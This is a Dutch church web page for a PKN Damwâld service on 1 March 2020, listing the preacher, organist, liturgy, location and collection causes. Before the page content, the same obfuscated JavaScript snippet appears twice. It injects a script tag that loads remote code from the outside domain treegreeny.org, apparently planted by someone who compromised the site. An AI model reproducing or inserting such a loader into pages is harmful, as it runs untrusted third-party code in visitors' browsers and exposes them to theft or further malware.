;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 1 maart 2020 14:00 uur - PKN Damwâld
zondag 1 maart 2020
14:00 uur

Kerkdienst zondag 1 maart 2020 14:00 uur

Thema: ‘Een mensbeeld en een godsbeeld dat je klem zet’

Informatie

Voorganger:Ds. A. Elverdink, Eastermar
Organist:Jelte Cuperus
Thema:‘Een mensbeeld en een godsbeeld dat je klem zet’
Liturgie
Lied voor de dienst Elb 186
Welkom
Intochtslied Nlb 61 : 1, 3 en 5
Onze Hulp en Groet
Geloofsbelijdenis .
We zingen: Nlb 868 : 1, 2 en 5
Gebed bij het openen van de Bijbel
We lezen: Genesis 3: 1-11 en Matteus 25: 14-30
We zingen: Nlb 944 : 1, 2 en 3
Preek ‘Een mensbeeld en een godsbeeld dat je klem zet’
We zingen: Nlb 512: 1, 2, 3 en 4
Gebeden
Collecte
We zingen: Elb 246
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Collecte informatie
Eerste collecte: Stichting Ontmoeting

Stichting Ontmoeting
Vastgelopen mensen worden door de Stichting Ontmoeting ondersteund om hun leven weer op orde te krijgen. Stichting Ontmoeting leert hen weer om op eigen benen te staan, relaties aan te gaan en te onderhouden en de juiste keuzes te maken. Zo krijgen ze weer perspectief in hun leven. Dank zij de vrijwilligers en medewerkers van Stichting Ontmoeting kan deze missie uitgevoerd worden. Ze zetten zich met hart en ziel in voor hun medemens. Door een luisterend oor of praktische begeleiding te bieden. Of door ondersteunende taken te verrichten.

Tweede collecte: Kerk
Uitganscollecte: 40Dagentijdcollecte - Voorjaarszendingscollecte

40Dagentijdcollecte - Voorjaarszendingscollecte: Golfstaten – De kracht van Bijbelverhalen
Hoewel het aantal christenen in het Midden-Oosten in rap tempo afneemt, is een tegenovergestelde trend zichtbaar in de Golfstaten. Hier groeit de kerk door de grote toestroom van arbeidsmigranten uit landen als India, Nepal en de Filipijnen. De meesten van hen zijn ongeletterd. Tegelijkertijd willen ze graag meer leren over de Bijbel. Kerk in Actie traint voorgangers in de storytelling-methode: een succesvolle interactieve methode waarbij Bijbelverhalen mondeling worden verteld en men met elkaar op zoek gaat naar de betekenis ervan voor het eigen leven. De arbeidsmigranten, die vaak een zwaar en eenzaam bestaan leiden, putten nieuwe moed uit deze verhalen. Bemoedig hen met uw collecte!